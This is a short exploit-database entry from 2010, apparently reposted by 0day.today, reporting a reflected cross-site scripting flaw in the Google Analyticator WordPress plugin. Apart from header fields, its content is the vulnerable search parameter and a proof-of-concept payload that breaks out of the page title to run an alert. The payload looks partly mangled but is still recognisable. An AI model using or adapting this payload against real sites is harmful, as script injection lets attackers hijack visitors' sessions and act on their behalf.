id: 11487
date: 03/28/2010
title: WordPress Google Analyticator Plugin XSS
author: Bloox
cves: 

========================================
WordPress Google Analyticator Plugin XSS
========================================

#############################################################
#

# Exploit Title: Google Analyticator wordpress plugin xss
# Date: 2010-03-27
# Author: Bloox
# Home : http://darkns.com
# Bug Type : Xss
# Link: http://wordpress.org/extend/plugins/google-analyticator/

#
#############################################################

Xss In Google Analyticator wordpress plugin

Affect: ?s=

'"><%2Ftitle>alert(1337)<%2Fscript>



#  0day.today [2023-03-24]  #